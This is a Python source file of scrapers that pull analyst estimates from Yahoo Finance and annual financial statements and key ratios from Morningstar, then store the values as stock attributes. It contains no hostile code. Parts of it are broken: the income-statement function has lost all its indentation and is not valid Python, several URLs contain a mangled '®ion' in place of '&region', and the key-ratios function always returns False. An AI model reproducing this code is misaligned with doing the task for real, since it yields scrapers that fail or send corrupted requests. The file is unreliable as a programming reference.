# Stock Analyst Estimates Scraping Functions
def yf_analyst_estimates_scrape(ticker):
    """Scrape the Yahoo Finance analyst-estimates page and store each value.

    Phase 1 flattens the yfnc_tableout1 tables into `data_list`, capturing
    the four quarter/year date labels separately into `date_list`.
    Phase 2 walks `data_list` as a heading -> subheading -> 4 values state
    machine and writes each value as `<heading>_<subheading>_<period>`
    attributes via db.set_Stock_attribute.

    BUGFIX: `data` is now initialized before the table loop; previously a
    cell matching none of the branches raised NameError at `if data:`.
    Also removed the unused locals `standard_analyst_scrape_positions`
    and `skip_position`.
    """
    logging.info("Starting: yf_analyst_estimates_scrape for %s" % ticker)
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        return
    soup = BeautifulSoup(urlopen('https://finance.yahoo.com/quote/{}/analysts'.format(ticker)), "html.parser")
    data_list = []
    date_list = [None, None, None, None]
    table = soup.findAll("table", { "class" : "yfnc_tableout1" })
    logging.info("table: {} rows".format(len(table)))
    if int(len(table)) == 0:
        logging.info("there is either no data for %s, or something went wrong, you can check by visiting" % ticker)
        logging.info('https://finance.yahoo.com/quote/{}/analysts'.format(ticker))
    count = 0
    data = None
    for i in table:
        rows = i.findChildren('tr')
        logging.info("rows: {} columns".format(len(rows)))
        for row in rows:
            cells = row.findChildren(['strong','th','td','br'])
            for cell in cells:
                if len(cell.contents) == 3: # this is specifically to capture the quarter dates
                    date_period = cell.contents[0]
                    date_period = date_period.replace(" ","_")
                    date_period = date_period.replace("/","_")
                    date_period = date_period.replace(".","")
                    date_period = date_period.replace("'","")
                    date_period = str(date_period)
                    date_value = cell.contents[2]
                    date_value = date_value.replace(" ","_")
                    date_value = date_value.replace("/","_")
                    date_value = date_value.replace(".","")
                    date_value = date_value.replace("'","")
                    date_value = str(date_value)
                    count += 1
                    data = date_period
                    date_data = date_value
                    date_position = None
                    if date_period == "Current_Qtr":
                        date_position = 0
                    elif date_period == "Next_Qtr":
                        date_position = 1
                    elif date_period == "Current_Year":
                        date_position = 2
                    elif date_period == "Next_Year":
                        date_position = 3
                    if date_position is not None:
                        if date_list[date_position] is None:
                            date_list[date_position] = date_data
                        elif date_list[date_position] != date_value:
                            # same period label seen twice with different dates
                            logging.error("Error")
                            return
                elif cell.string is not None:
                    value = cell.string
                    count += 1
                    data = str(value)
                else:
                    # cell has nested markup; take the first child with text
                    children = cell.findChildren()
                    for child in children:
                        value = child.string
                        if value is not None:
                            count += 1
                            data = str(value)
                if data:
                    # period labels were already captured into date_list above
                    if data not in ["Current_Qtr", "Next_Qtr", "Current_Year", "Next_Year"]:
                        data_list.append(data)
                    data = None
    # Known positions within the flattened list (empirically determined).
    heading_positions = [
        1,  # Earnings Est
        28, # Revenue Est
        60, # Earnings History
        86, # EPS Trends
        113,# EPS Revisions
        135 # Growth Est
    ]
    subheading_positions = [
        2, 7, 12, 17, 22, # Earnings Est
        29, 34, 39, 44, 49, 54, # Revenue Est
        65, 70, 75, 80, # Earnings History
        87, 92, 97, 102, 107, # EPS Trends
        114, 119, 124, 129, # EPS Revisions
        # this is where the special non-date related subheadings start
        140, 145, 150, 155, 160, 165, 170, 175, # Growth Est
    ]
    heading = None
    subheading = None
    date_period_list = ["Current_Qtr", "Next_Qtr", "Current_Year", "Next_Year"]
    date_period_list_position = 0
    earnings_history_date_locations = [heading_positions[2]+1, heading_positions[2]+2, heading_positions[2]+3, heading_positions[2]+4]
    earnings_history_dates = ["12_months_ago", "9_months_ago", "6_months_ago", "3_months_ago"]
    earnings_history_date_position = 0
    growth_estimate_reference_locations = [heading_positions[-1]+1, heading_positions[-1]+2, heading_positions[-1]+3, heading_positions[-1]+4]
    growth_estimate_references = ["Stock", "Industry", "Sector", "S&P_500"]
    growth_estimate_reference_position = 0
    headings = ["Earnings Est", "Revenue Est", "EPS Trends", "EPS Revisions", "Earnings History","Growth Est"]
    subheadings = [
        "Avg. Estimate",
        "No. of Analysts",
        "Low Estimate",
        "High Estimate",
        "Year Ago EPS",
        "Avg. Estimate",
        "No. of Analysts",
        "Low Estimate",
        "High Estimate",
        "Year Ago Sales",
        "Sales Growth (year/est)",
        "Sales Growth (year over est)", # needed for edited subheading
        "EPS Est",
        "EPS Actual",
        "Difference",
        "Surprise %",
        "Current Estimate",
        "7 Days Ago",
        "30 Days Ago",
        "60 Days Ago",
        "90 Days Ago",
        "Up Last 7 Days",
        "Up Last 30 Days",
        "Down Last 30 Days",
        "Down Last 90 Days",
        "Current Qtr.",
        "Next Qtr.",
        "This Year",
        "Next Year",
        "Past 5 Years (per annum)",
        "Next 5 Years (per annum)",
        "Price/Earnings (avg. for comparison categories)",
        "PEG Ratio (avg. for comparison categories)",
    ]
    next_position_is_heading = False
    next_position_is_subheading = False
    data_countdown = 0
    count = 0 # 0th will always be skipped
    for i in data_list:
        do_print = True
        if str(i) in headings and next_position_is_heading == False:
            # first heading occurrence is the table-of-contents duplicate
            next_position_is_heading = True
        elif str(i) in headings and next_position_is_heading == True:
            heading = i
            next_position_is_subheading = True
            next_position_is_heading = False
        elif next_position_is_subheading == True:
            subheading = i
            data_countdown = 4
            next_position_is_subheading = False
        elif data_countdown > 0:
            if str(subheading) not in subheadings:
                logging.info("%d > %s > %s" % (count, subheading, i))
                subheading = None
                next_position_is_subheading = True
                continue
            # NOTE(review): in the Earnings History / Growth Est branches a
            # date-location hit leaves stock_attribute_name from the previous
            # iteration — looks intentional (dates re-stored under the prior
            # key) but worth confirming.
            if heading in ["Earnings Est", "Revenue Est", "EPS Trends", "EPS Revisions"]:
                if subheading == "Sales Growth (year/est)":
                    subheading = "Sales Growth (year over est)"
                stock_attribute_name = str(heading) + "_" + str(subheading) + "_" + str(date_period_list[date_period_list_position % 4])
                date_period_list_position += 1
            elif heading in ["Earnings History"]:
                if count not in earnings_history_date_locations:
                    stock_attribute_name = str(heading) + "_" + str(subheading) + "_" + str(earnings_history_dates[earnings_history_date_position % 4])
                    earnings_history_date_position += 1
            elif heading in ["Growth Est"]:
                if count not in growth_estimate_reference_locations:
                    stock_attribute_name = str(heading) + "_" + str(subheading) + "_" + str(growth_estimate_references[growth_estimate_reference_position % 4])
                    growth_estimate_reference_position += 1
            stock_attribute_name = stock_attribute_name.replace(" ","_")
            stock_attribute_name = stock_attribute_name.replace("/","_")
            stock_attribute_name = stock_attribute_name.replace(".","")
            stock_attribute_name = stock_attribute_name.replace("'","")
            stock_attribute_name = stock_attribute_name.replace("%","Pct")
            stock_attribute_name = stock_attribute_name.replace("(","")
            stock_attribute_name = stock_attribute_name.replace(")","")
            db.set_Stock_attribute(stock, stock_attribute_name, i, "_yf")
            logging.info("%d > %s.%s = %s" % (count, stock.symbol, stock_attribute_name, i))
            do_print = False
            data_countdown -= 1
            if data_countdown == 0 and next_position_is_subheading != True:
                subheading = None
                next_position_is_subheading = True
        if do_print == True:
            logging.info("{} {} {}".format(count, "|", i))
        count += 1
    db.save_GLOBAL_STOCK_DICT()
################################################################################################
##################### Morningstar Scrapers "_ms" ###############################################
# Morningstar Annual Data Scrapers
def ms_annual_cash_flow_scrape(ticker):
    """Scrape Morningstar's annual cash-flow report for `ticker` and store it.

    Fetches the JSONP-wrapped HTML report, strips the JSONP escaping by
    hand, then walks the labelled divs (label_* / data_*) collecting each
    row name plus six years of raw values, which are stored on the Stock
    as `<attribute>`, `<attribute>_t1y` ... `<attribute>_t5y` with the
    "_ms" suffix.

    Returns True when at least one attribute was stored, otherwise falls
    through (None) — unchanged from the original contract.

    BUGFIX: added `return` after the missing-stock error; previously the
    function continued and crashed on `None.last_cash_flow_update_ms`.
    """
    logging.info("Starting: ms_annual_cash_flow_scrape for %s" % ticker)
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        logging.error("Error: stock %s does not exist" % ticker)
        return
    most_recent_update = stock.last_cash_flow_update_ms
    last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
    if most_recent_update > last_acceptable_update:
        logging.info("MS Cash flow data for %s is up to date." % ticker)
        return
    # Morningstar keys its URLs by exchange code, not ticker alone.
    exchange = getattr(stock, config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE)
    if exchange == 'NYSE':
        exchange_code = "XNYS"
    elif exchange in ["NasdaqNM", "NASDAQ"]:
        exchange_code = "XNAS"
    else:
        logging.info("Unknown Exchange Code for {}".format(stock.symbol))
        return
    morningstar_raw = urlopen('http://financials.morningstar.com/ajax/ReportProcess4HtmlAjax.html?&t=%s:%s&region=usa&culture=en-US&cur=USD&reportType=cf&period=12&dataType=A&order=asc&columnYear=5&rounding=3&view=raw&r=963470&callback=jsonp%d&_=%d' % (exchange_code, ticker, int(time.time()), int(time.time()+150)))
    morningstar_json = morningstar_raw.read()
    morningstar_string = str(morningstar_json)
    # Manually unwrap the JSONP payload: copy from the first "<" onward and
    # collapse backslash escapes (\t/\r/\n dropped, \" \' \/ unescaped).
    dummy_str = ""
    start_copy = False
    last_char_was_backslash = False
    for char in morningstar_string:
        if char == "<" and not start_copy:
            start_copy = True
            dummy_str += char
        elif start_copy:
            if char == "\\":
                last_char_was_backslash = True
            elif last_char_was_backslash == True:
                if char in ["t","r","n"]:
                    last_char_was_backslash = False
                elif char in ['"', "'", "/"]:
                    dummy_str += char
                    last_char_was_backslash = False
                else:
                    logging.info("\\%s" % char)
                    last_char_was_backslash = False
            else:
                dummy_str += char
    morningstar_html = dummy_str
    soup = BeautifulSoup(morningstar_html, "html.parser")
    full_data = []
    div_ids = ["tts", "s", "i"] # these are the three unique labels for divs on morningstar
    for div_id in div_ids:
        count = 0
        for _ in range(100): # upper bound on rows per section; may need to be larger
            label = soup.find("div", {"id":"label_%s%d" % (div_id, count)})
            if label:
                try:
                    label["style"]
                    if "display:none;" in str(label["style"]):
                        # not comfortable accepting hidden data right now
                        count += 1
                        continue
                except Exception:
                    pass  # no style attribute -> row is visible
                name = label.find("div", {"class":"lbl"})
                try:
                    title = name["title"]
                    name = title
                except Exception:
                    title = None
                    name = name.string
            else:
                count += 1
                continue
            data = soup.find("div", {"id":"data_%s%d" % (div_id, count)})
            if data:
                data_list = []
                # Y_6 .. Y_1 (ids are ordinal, collected newest-suffix first)
                for year_id in range(6, 0, -1):
                    data_list.append(data.find("div", {"id":"Y_%d" % year_id})["rawvalue"])
                full_data.append([name, data_list])
            count += 1
    logging.info("total units of data = {}".format(len(full_data)))
    success = False
    for datum in full_data:
        # Sanitise the row label into an attribute name.
        attribute = datum[0]
        attribute = attribute.replace(" ","_")
        attribute = attribute.replace("-","_")
        attribute = attribute.replace("/","_")
        attribute = attribute.replace(",","_")
        attribute = attribute.replace("'","")
        attribute = attribute.replace("(Gain)_", "")
        attribute = attribute.replace("(expense)_", "")
        attribute = attribute.replace("(used_for)", "used_for")
        attribute = attribute.replace("__","_")
        data_list = datum[1]
        trailing_x_year_list = ["", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y"]
        for i in range(len(data_list)):
            if data_list[i] == u'\u2014':  # em dash = "no value"
                data_list[i] = "-"
            try:
                db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
                success = True
            except Exception:
                # non-integer value (e.g. "-" placeholder): store as string
                try:
                    logging.info(data_list[i])
                    db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
                    success = True
                except Exception as exception:
                    logging.error(exception)
    if success:
        db.save_GLOBAL_STOCK_DICT()
    logging.info("\ncash flow done\n")
    return success
def ms_annual_income_statement_scrape(ticker):
logging.info("Starting: ms_annual_income_statement_scrape for %s" % ticker)
stock = utils.return_stock_by_symbol(ticker)
if not stock:
logging.error("Error: stock %s does not exist" % ticker)
most_recent_update = stock.last_income_statement_update_ms
last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
if most_recent_update > last_acceptable_update:
logging.info("MS income statement data for %s is up to date." % ticker)
return
if stock:
exchange = getattr(stock, config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE)
if exchange == 'NYSE':
exchange_code = "XNYS"
elif exchange in ["NasdaqNM", "NASDAQ"]:
exchange_code = "XNAS"
else:
logging.info("Unknown Exchange Code for {}".format(stock.symbol))
return
else:
logging.warning('Stock cannot be updated, need exchange symbol')
return
morningstar_raw = urlopen('http://financials.morningstar.com/ajax/ReportProcess4HtmlAjax.html?&t=%s:%s®ion=usa&culture=en-US&cur=USD&reportType=is&period=12&dataType=A&order=asc&columnYear=5&rounding=3&view=raw&r=354589&callback=jsonp%d&_=%d' % (exchange_code, ticker, int(time.time()), int(time.time()+150)))
morningstar_json = morningstar_raw.read()
morningstar_string = str(morningstar_json)
# dummy_str = ""
# start_copy = False
# for char in morningstar_string:
# if start_copy == False and char != "(":
# continue
# elif start_copy == False and char == "(":
# start_copy = True
# continue
# elif start_copy == True:
# dummy_str += char
# morningstar_string = dummy_str[:-1]
# try:
# morningstar_json = json.loads(morningstar_string)
# except Exception as exception:
# print exception
# print morningstar_string
# print morningstar_raw.read()
# return
# #print morningstar_json["ADR"], "<-- should say false"
# morningstar_html = morningstar_json["result"]
dummy_str = ""
start_copy = False
last_char_was_backslash = False
for char in morningstar_string:
if char == "<" and not start_copy:
start_copy = True
dummy_str += char
elif start_copy:
if char == "\\":
last_char_was_backslash = True
elif last_char_was_backslash == True:
if char in ["t","r","n"]:
last_char_was_backslash = False
elif char in ['"', "'", "/"]:
dummy_str += char
last_char_was_backslash = False
else:
logging.info("\\%s" % char)
last_char_was_backslash = False
else:
dummy_str += char
morningstar_html = dummy_str
soup = BeautifulSoup(morningstar_html, "html.parser")
full_data = []
div_ids = ["tts", "s", "i", "g", "gg"] # these are the three unique labels for divs on morningstar
for div_id in div_ids:
count = 0
for i in range(100): # this may need to be larger
label = soup.find("div", {"id":"label_%s%d" % (div_id, count)})
if label:
try:
label["style"]
if "display:none;" in str(label["style"]):
# I'm not comfortable accepting unshown data right now
count+=1
continue
except:
pass
name = label.find("div", {"class":"lbl"})
try:
title = name["title"]
name = title
except:
title = None
name = name.string
if not name:
name = label.findAll(text=True)
#name = name.string
name = str(name)
dummy_str = ""
u_gone = False # there is a "u" that starts every fake unicode thing
for i in name:
if i not in ["'",'"',"[","]"]:
if i == "u" and u_gone == False:
u_gone = True
else:
dummy_str += i
name = dummy_str
if name in ["Basic", "Diluted"]: # here there is a quirk, where EPS is in the previous div, and so you need to grab it and add it onto the name
if name == "Basic":
try:
prefix = label.findPreviousSibling('div').find("div", {"class":"lbl"})["title"]
except:
prefix = label.findPreviousSibling('div').find("div", {"class":"lbl"}).string
elif name == "Diluted":
try:
prefix = label.findPreviousSibling('div').findPreviousSibling('div').find("div", {"class":"lbl"})["title"]
except:
prefix = label.findPreviousSibling('div').findPreviousSibling('div').find("div", {"class":"lbl"}).string
name = prefix + " " + name
else:
name = None
count += 1
continue
data = soup.find("div", {"id":"data_%s%d" % (div_id, count)})
if data:
data_list = []
for i in reversed(range(6)): # 6 data points on this page
i += 1 # id's are ordinal
found_data = data.find("div", {"id":"Y_%d" % i})["rawvalue"]
if found_data:
data_list.append(found_data)
else:
logging.info(data)
if name and data_list:
full_data.append([str(name),data_list])
else:
if not name:
logging.info("{} {} {} {}".format(label, "\n", name, "\n"))
elif not data_list:
logging.info(data)
count+=1
logging.info("total units of data = {}".format(len(full_data)))
success = False
for datum in full_data:
attribute = datum[0]
attribute = attribute.replace(" ","_")
attribute = attribute.replace("-","_")
attribute = attribute.replace("/","_")
attribute = attribute.replace(",","_")
attribute = attribute.replace("'","")
attribute = attribute.replace("(Gain)_", "")
attribute = attribute.replace("(expense)_", "")
attribute = attribute.replace("(used_for)", "used_for")
attribute = attribute.replace("__","_")
data_list = datum[1]
trailing_x_year_list = ["_ttm", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y"]
for i in range(len(data_list)):
if data_list[i] == u'\u2014':
data_list[i] = "-"
elif data_list[i] == "nbsp":
continue
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", int(data_list[i])))
success = True
except:
try:
db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
#logging.info("{} {} {}".format(stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", str(data_list[i])))
success = True
except Exception as exception:
logging.error(exception)
if success:
db.save_GLOBAL_STOCK_DICT()
logging.info("\nincome statement done\n")
return success
def ms_annual_balance_sheet_scrape(ticker):
    """Scrape Morningstar's annual balance sheet report for ``ticker`` and
    save every line item onto the matching wxStocks Stock object.

    Values are written via ``db.set_Stock_attribute`` with the ``"_ms"``
    suffix; the newest column gets no year tag and older columns are tagged
    ``_t1y`` .. ``_t5y`` (see ``trailing_x_year_list`` below).

    Parameters
    ----------
    ticker : str
        Symbol of a stock already present in the wxStocks database.

    Returns
    -------
    bool or None
        True if at least one attribute was saved, False if the page parsed
        to nothing, None on early exit (unknown stock/exchange, fresh data).
    """
    logging.info("Starting: ms_annual_balance_sheet_scrape for %s" % ticker)
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        logging.info("Error: stock %s does not exist" % ticker)
        # Bug fix: previously fell through and raised AttributeError on the
        # attribute access below whenever the stock was missing.
        return
    most_recent_update = stock.last_balance_sheet_update_ms
    last_acceptable_update = float(time.time()) - config.TIME_ALLOWED_FOR_BEFORE_RECENT_UPDATE_IS_STALE
    if most_recent_update > last_acceptable_update:
        logging.info("MS balance sheet data for %s is up to date." % ticker)
        return
    # map the exchange name to Morningstar's exchange code
    exchange = getattr(stock, config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE)
    if exchange == 'NYSE':
        exchange_code = "XNYS"
    elif exchange in ["NasdaqNM", "NASDAQ"]:
        exchange_code = "XNAS"
    else:
        logging.info("Unknown Exchange Code for {}".format(stock.symbol))
        return
    # Bug fix: the query string contained a literal "(R)ion" character (an
    # HTML-entity mangling of "&region"), which corrupted the parameters.
    url = ('http://financials.morningstar.com/ajax/ReportProcess4HtmlAjax.html'
           '?&t=%s:%s&region=usa&culture=en-US&cur=USD&reportType=bs&period=12'
           '&dataType=A&order=asc&columnYear=5&rounding=3&view=raw' % (exchange_code, ticker))
    morningstar_raw = urlopen(url)
    logging.info("morningstar_raw: {}\n".format(morningstar_raw))
    if not morningstar_raw:
        logging.info("failed")
    morningstar_string = str(morningstar_raw.read())
    # Strip everything before the first HTML tag and unescape the
    # backslash-escaped quotes/slashes embedded in the JSONP payload.
    dummy_str = ""
    start_copy = False
    last_char_was_backslash = False
    for char in morningstar_string:
        if char == "<" and not start_copy:
            start_copy = True
            dummy_str += char
        elif start_copy:
            if char == "\\":
                last_char_was_backslash = True
            elif last_char_was_backslash:
                if char in ["t", "r", "n"]:
                    # escaped whitespace: drop it entirely
                    last_char_was_backslash = False
                elif char in ['"', "'", "/"]:
                    dummy_str += char
                    last_char_was_backslash = False
                else:
                    logging.info("\\%s" % char)
                    last_char_was_backslash = False
            else:
                dummy_str += char
    morningstar_html = dummy_str
    soup = BeautifulSoup(morningstar_html, "html.parser")
    full_data = []
    # the unique label prefixes Morningstar uses for its report rows
    div_ids = ["tts", "s", "i", "g", "gg"]
    for div_id in div_ids:
        count = 0
        for _ in range(100):  # upper bound on rows per section; may need to be larger
            label = soup.find("div", {"id": "label_%s%d" % (div_id, count)})
            if label:
                try:
                    label["style"]
                    if "display:none;" in str(label["style"]):
                        # skip hidden rows: not comfortable accepting unshown data
                        count += 1
                        continue
                except Exception:
                    pass
                name = label.find("div", {"class": "lbl"})
                try:
                    name = name["title"]
                except Exception:
                    name = name.string
                if not name:
                    # fall back to the raw text nodes and strip the
                    # list/unicode markers their repr leaves behind
                    name = str(label.findAll(text=True))
                    dummy_str = ""
                    u_gone = False  # a "u" prefix starts every fake unicode thing
                    for ch in name:
                        if ch not in ["'", '"', "[", "]"]:
                            if ch == "u" and not u_gone:
                                u_gone = True
                            else:
                                dummy_str += ch
                    name = dummy_str
            else:
                name = None
                count += 1
                continue
            data = soup.find("div", {"id": "data_%s%d" % (div_id, count)})
            # Bug fix: data_list was previously unbound (NameError) when the
            # very first data div was missing.
            data_list = []
            if data:
                for col in reversed(range(5)):
                    col += 1  # column id's are ordinal (Y_1 .. Y_5)
                    found_data = data.find("div", {"id": "Y_%d" % col})["rawvalue"]
                    if found_data:
                        data_list.append(found_data)
            else:
                logging.info(data)
            if name and data_list:
                full_data.append([str(name), data_list])
            else:
                if not name:
                    logging.info("{} {} {} {}".format(label, "\n", name, "\n"))
                elif not data_list:
                    logging.info(data)
            count += 1
    logging.info("total units of data = {}".format(len(full_data)))
    success = False
    for datum in full_data:
        # normalize the scraped row name into an attribute-safe identifier
        attribute = datum[0]
        for old, new in [(" ", "_"), ("-", "_"), ("/", "_"), (",", "_"),
                         ("'", ""), ("(Gain)_", ""), ("(expense)_", ""),
                         ("(used_for)", "used_for"), ("__", "_")]:
            attribute = attribute.replace(old, new)
        data_list = datum[1]
        trailing_x_year_list = ["", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y"]
        for i in range(len(data_list)):
            if data_list[i] == u'\u2014':  # em dash placeholder -> "-"
                data_list[i] = "-"
            # prefer the numeric form; fall back to the raw string
            try:
                db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
                success = True
            except Exception:
                try:
                    db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
                    success = True
                except Exception as exception:
                    logging.error(exception)
    if success:
        db.save_GLOBAL_STOCK_DICT()
    logging.info("\nbalance sheet done\n")
    return success
# Morningstar Key Ratios (Not incredibly reliable for all data (rounding large numbers), consider alternatives if necessary)
def ms_key_ratios_scrape(ticker):
    """Scrape Morningstar's "Key Ratios" page for `ticker` and save each row
    onto the matching Stock object with the "_ms" attribute suffix.

    NOTE(review): the trailing `success = False` below (marked "testing
    only") means this function currently always returns False.
    """
    stock_exchange_var = config.DEFAULT_STOCK_EXCHANGE_ATTRIBUTE
    logging.info("Starting: ms_key_ratios_scrape for %s" % ticker)
    ticker = ticker.upper()
    logging.info("morningstar_key_ratios_scrape: {}".format(ticker))
    stock = utils.return_stock_by_symbol(ticker)
    if not stock:
        return
    if stock:
        yesterdays_epoch = float(time.time()) - (60 * 60 * 24)
        #if stock.morningstar_key_ratios_scrape > yesterdays_epoch: # if data is more than a day old
        #    logging.info("Cash flow data for %s is up to date." % ticker)
        #    return
        # map the exchange name to Morningstar's exchange code
        exchange = getattr(stock, stock_exchange_var)
        logging.info(exchange)
        if exchange == 'NYSE':
            exchange_code = "XNYS"
        elif exchange in ["NasdaqNM", "NASDAQ"]:
            exchange_code = "XNAS"
        else:
            logging.info("Unknown Exchange Code for {}".format(stock.symbol))
            return
    ### First get your scrape ###
    # NOTE(review): the "(R)ion" sequence in these URLs looks like an
    # HTML-entity mangling of "&region" -- confirm against a live request.
    logging.info('http://financials.morningstar.com/financials/getFinancePart.html?&callback=jsonp1408061143067&t=%s:%s®ion=usa&culture=en-US&cur=USD&order=asc&_=1408061143210' % (exchange_code, ticker))
    morningstar_raw = urlopen('http://financials.morningstar.com/financials/getFinancePart.html?&callback=jsonp1408061143067&t=%s:%s®ion=usa&culture=en-US&cur=USD&order=asc&_=1408061143210' % (exchange_code, ticker))
    #morningstar_raw = urlopen('http://financials.morningstar.com/ajax/exportKR2CSV.html?&callback=?&t=%s:%s®ion=usa&culture=en-US&cur=USD&order=' % (exchange_code, ticker) )#, int(time.time()), int(time.time()+150)))
    morningstar_json = morningstar_raw.read()
    #logging.info(morningstar_json)
    morningstar_string = str(morningstar_json)
    ### Now, remove improper chars ###
    # keep everything from the first "<" onward, dropping backslash escapes
    dummy_str = ""
    start_copy = False
    last_char_was_backslash = False
    for char in morningstar_string:
        if char == "<" and not start_copy:
            start_copy = True
            dummy_str += char
        elif start_copy:
            if char == "\\":
                last_char_was_backslash = True
            elif last_char_was_backslash == True:
                if char in ["t","r","n"]:
                    last_char_was_backslash = False
                elif char in ['"', "'", "/"]:
                    dummy_str += char
                    last_char_was_backslash = False
                else:
                    #logging.info("\\%s" % char)
                    last_char_was_backslash = False
            else:
                dummy_str += char
    #logging.info(dummy_str)
    morningstar_html = dummy_str
    #logging.info(morningstar_html)
    ### convert to soup ###
    soup = BeautifulSoup(morningstar_html, "html.parser")
    full_data = []
    ### parse the soup ###
    # Here we set the dates
    # Y10 = ttm
    # Y9 = t1y
    # Y8 = t2y
    # etc.
    data_list = []
    div_id = "i" # these are the three unique labels for divs on morningstar
    count = 0
    for i in range(100): # this may need to be larger
        label = soup.find("th", {"id":"%s%d" % (div_id, count)})
        if label:
            # first find the row names and units
            try:
                label["style"]
                if "display:none;" in str(label["style"]):
                    # I'm not comfortable accepting unshown data right now
                    count+=1
                    continue
            except:
                pass
            name = label.contents[0]
            if len(label) > 1:
                units = label.contents[1]
                units = units.contents[0]
            # NOTE(review): if len(label) <= 1, `units` is unbound (or stale
            # from a prior row) on the data_sublist line below -- confirm
            # every row header carries a units element.
            #logging.info((name, units))
            label_data = []
            data_sublist = [str(name), str(units), label_data]
            # Now gather the data using the row id and year in the "header" section
            # "Y0" or year 0, appears to be 10 years ago,
            # where as Y10 appears to be the trailing 12 months data
            # it's a bit of some odd data, but it's obviously manageable.
            for years_ago in reversed(range(11)): # this may also be larger
                data = soup.find("td", {"headers": "Y%d i%d" % (years_ago, count)})
                if data:
                    #logging.info(data.contents)
                    for datum in data.contents:
                        label_data.append(str(datum))
            #logging.info(data_sublist)
            data_list.append(data_sublist)
        else:
            name = None
            count += 1
            continue
        #if name:
        #    logging.info(name.children())
        data = soup.find("div", {"id":"data_%s%d" % (div_id, count)})
        if data:
            data_list = []
            for i in reversed(range(6)):
                i += 1 # id's are ordinal
                data_list.append(data.find("div", {"id":"Y_%d" % i})["rawvalue"])
            full_data.append([name,data_list])
        count+=1
    logging.info(("total units of data =", len(data_list)))
    success = False
    ### convert to data_lists ###
    #########
    # normalize strings, then expand "USD Mil" rows to full-dollar values
    data_list = morningstar_recursive_data_list_string_edit(data_list)
    data_list = morningstar_add_zeros_to_usd_millions(data_list)
    #########
    #logging.info("data_list print follows:")
    #pp.pprint(data_list)
    ### save data to object ###
    # datum is [name, units, [datalist]]
    count = 1
    for datum in data_list:
        attribute = datum[0]
        count += 1
        # NOTE(review): this rebinds `data_list` while it is being iterated;
        # iteration still follows the original list, but the name is
        # misleading.
        data_list = datum[2]
        trailing_x_year_list = ["_ttm", "_t1y", "_t2y", "_t3y", "_t4y", "_t5y", "_t6y", "_t7y", "_t8y", "_t9y", "_t10y"]
        for i in range(len(data_list)):
            if data_list[i] == u'\u2014':
                # em dash placeholder -> "-"
                data_list[i] = "-"
            # prefer the numeric form; fall back to saving the raw string
            try:
                db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), int(data_list[i]), "_ms")
                #logging.info((stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", int(data_list[i])))
            except:
                try:
                    db.set_Stock_attribute(stock, str(attribute + trailing_x_year_list[i]), str(data_list[i]), "_ms")
                    #logging.info((stock.symbol + "." + str(attribute + trailing_x_year_list[i] + "_ms"), "=", str(data_list[i])))
                except Exception as exception:
                    logging.error(exception)
    # testing only
    success = False
    #
    ### save object ###
    stock.last_morningstar_key_ratios_update = float(time.time())
    db.save_GLOBAL_STOCK_DICT()
    logging.info(("\n", "key ratios done", "\n"))
    return success
def morningstar_recursive_data_list_string_edit(data_list, recursion_count = 0):
    """Recursively sanitize scraped Morningstar strings.

    Numeric strings have their thousands separators removed; every other
    string is converted into an attribute-safe identifier (spaces/slashes
    to underscores, "%" to "perc", etc.). Nested lists are processed
    recursively up to 10 levels deep; beyond that, None is returned for
    the over-deep sublist.

    Parameters
    ----------
    data_list : list
        Mixed list of strings / nested lists (non-strings pass through).
    recursion_count : int
        Internal depth counter; callers should leave the default.

    Returns
    -------
    list or None
        Sanitized copy of data_list, or None past the recursion limit.
    """
    cleaned = []
    for datum in data_list:
        if type(datum) is list:
            recursion_count += 1
            if recursion_count > 10:
                logging.info("max recursions achieved")
                return
            datum = morningstar_recursive_data_list_string_edit(datum, recursion_count = recursion_count)
            recursion_count -= 1
        elif isinstance(datum, str):
            # Bug fix: this test was `type(datum) is (str or unicode)`;
            # `(str or unicode)` short-circuits to `str`, which only worked
            # by accident (and referenced the Py2-only `unicode` name).
            try:
                datum = datum.replace(",", "")
                if not datum.isdigit():
                    raise Exception("Not a number")
                datum = datum.replace("\xe2\x80\x94", "-")
            except Exception:
                # not a plain number: build an attribute-safe identifier
                datum = datum.replace("%", "perc")
                datum = datum.replace(" ", "_")
                datum = datum.replace("/", "_")
                datum = datum.replace(",", "_")
                datum = datum.replace("'", "")
                datum = datum.replace("(Gain)_", "")
                datum = datum.replace("(expense)_", "")
                datum = datum.replace("(used_for)", "used_for")
                datum = datum.replace("__", "_")
                datum = datum.replace("\xc2\xa0", "")
                datum = datum.replace("\xe2\x80\x94", "-")
        cleaned.append(datum)
    return cleaned
def morningstar_add_zeros_to_usd_millions(data_list):
    """Expand "millions" rows into full units.

    Each entry is expected to be ``[name, units, values]``. When the units
    field says millions, every all-digit value gets "000" appended and the
    units field is rewritten ("USD Mil" -> "USD_from_Mil", "Mil" ->
    "was_Mil"); other entries pass through untouched. Entries are mutated
    in place and returned as a new list.
    """
    result = []
    for entry in data_list:
        if len(entry) != 3:
            logging.error("morningstar_add_zeros_to_usd_millions error, not correctly formated list")
        units = entry[1]
        if units in ("USD Mil", "USD_Mil"):
            entry[2] = [v + "000" if str(v).isdigit() else v for v in entry[2]]
